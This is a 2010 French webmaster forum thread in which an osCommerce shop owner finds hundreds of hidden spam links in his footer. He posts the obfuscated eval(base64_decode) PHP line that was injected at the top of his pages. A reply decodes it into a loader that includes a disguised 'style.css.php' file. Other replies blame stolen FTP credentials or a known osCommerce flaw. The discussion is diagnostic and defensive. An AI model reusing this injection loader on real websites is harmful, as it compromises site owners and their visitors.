Virus ? liens externes invisibles apparut dans mon footer ?

Discussion dans 'Problèmes de référencement spécifiques à vos sites' créé par nairod60, 28 Avril 2010.

Tags:
  1. nairod60
    nairod60 Nouveau WRInaute
    Inscrit:
    21 Mars 2010
    Messages:
    25
    J'aime reçus:
    0
    Bonjour
    Regarder sur mon site http://www.auxstickers.com environ 500 liens sont apparut dans mon footer ils sont invisible, regarder dans la source de la page pour les voir. Ils pointes tous vers des sites ecommerce infectés tout comme moi par les mêmes liens externes ? j'ai du choper ce truc avec un soft de seo
     
  2. UsagiYojimbo
    UsagiYojimbo WRInaute accro
    Inscrit:
    23 Novembre 2005
    Messages:
    11 974
    J'aime reçus:
    121
    Ca ou tu t'es fait sniffer tes accès FTP (j'ai eu le cas sur le site d'un client dont le site s'est fait modifier de cette façon suite à la récupération de ses accès FTP).
     
  3. Haroeris
    Haroeris WRInaute impliqué
    Inscrit:
    13 Avril 2010
    Messages:
    649
    J'aime reçus:
    0
    bloques l'accès avec un htaccess pendant tes mises à jour, j'ai eu accès à des informations pendants quelques secondes. :wink:
     
  4. nairod60
    nairod60 Nouveau WRInaute
    Inscrit:
    21 Mars 2010
    Messages:
    25
    J'aime reçus:
    0
    J'ai trouvé! En haut de toute mes pages j'avais cette ligne (coder) :
    "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lei4zMTMvYXV4c3RpY2svd3d3L2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>"

    Et les fichiers sources étaient cachés dans le dossier admin.

    Plus d'info ici "http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/"

    J'ai chopé ca avec un soft seo que j'ai installé hier, je retrouve le nom et je le poste.

    Cordialement DOrian
     
  5. raljx
    raljx WRInaute passionné
    Inscrit:
    10 Juillet 2006
    Messages:
    2 022
    J'aime reçus:
    0
    Code:
    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/homez.313/auxstick/www/admin/includes/languages/english/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}
     
  6. UsagiYojimbo
    UsagiYojimbo WRInaute accro
    Inscrit:
    23 Novembre 2005
    Messages:
    11 974
    J'aime reçus:
    121
    Je suis pas sûr que le soft SEO soit en cause. Il faut un soft capable de modifier les pages directement sur le serveur pour faire ça, et de traiter du php. Etant donné que tu utilise oscommerce, qui est connu pour ses failles plus que nombreuses, ça sent davantage l'injection SQL ou le détournement des accès FTP.

    A ta place je changerais immédiatement mes identifiants FTP déjà.
     
  7. nairod60
    nairod60 Nouveau WRInaute
    Inscrit:
    21 Mars 2010
    Messages:
    25
    J'aime reçus:
    0
    Tu avais raison c'était bien une injection.
    Faille sur oscommerce rc2a pourtant bien connue (on en apprend tous les jours...).
    J'ai passé toute mon après midi et soirée a effacer tous les morceaux de code injecté (tous codés, ce qui de ne facilite pas la tache...) reste plus qu'à boucher la faille!
     
  8. UsagiYojimbo
    UsagiYojimbo WRInaute accro
    Inscrit:
    23 Novembre 2005
    Messages:
    11 974
    J'aime reçus:
    121
    OsCommerce est franchement le script d'E-Commerce à proscrire, trop de trous de sécu dans tous les sens, et codé avec les pieds (même si à une époque ça ne l'empêchait pas de dominer le marché des scripts E-commerce).
     
Chargement...
Similar Threads - Virus liens externes Forum Date
probleme antivirus et liens Le café de WebRankInfo 29 Avril 2004
L'antivirus est-il utile pour protéger les données professionnelles? Le café de WebRankInfo 17 Septembre 2020
Site entraide coronavirus Demandes d'avis et de conseils sur vos sites 26 Mars 2020
Impact du Coronavirus sur le trafic web Référencement Google 26 Mars 2020
Répercussion du Coronavirus sur Adsense AdSense 25 Mars 2020
Quel impact SEO du corona virus covid19 ? Débuter en référencement 18 Mars 2020
Choix pour un antivirus payant Le café de WebRankInfo 25 Juin 2018
[webmastertool] erreur d'exploration - virus? Crawl et indexation Google, sitemaps 16 Novembre 2015
Virus Ukash police sur ipad Le café de WebRankInfo 29 Mars 2015
Virus Topbuyer Débuter en référencement 29 Septembre 2014
YOAST SEO plugin, Virus/bug ? Problèmes de référencement spécifiques à vos sites 26 Août 2014
Gros virus sur mon site web, help Administration d'un site Web 13 Juillet 2014
Nouvel antivirus Demandes d'avis et de conseils sur vos sites 8 Avril 2014
anti-virus ou anti-Malware pour site web, lequel ? Le café de WebRankInfo 27 Mars 2013
Virus malveillant Crawl et indexation Google, sitemaps 30 Octobre 2012
Avis test antivirus manzai test Demandes d'avis et de conseils sur vos sites 22 Septembre 2012
Upload fichiers par user et problématique virus ? Développement d'un site Web ou d'une appli mobile 20 Septembre 2012
virus qui ouvre des publicités sur firefox Le café de WebRankInfo 27 Juillet 2012
Un site joomla piraté ou infecté par un virus ? à l'aide.( Problèmes de référencement spécifiques à vos sites 2 Mars 2012
virus sur mon serveur Administration d'un site Web 28 Février 2012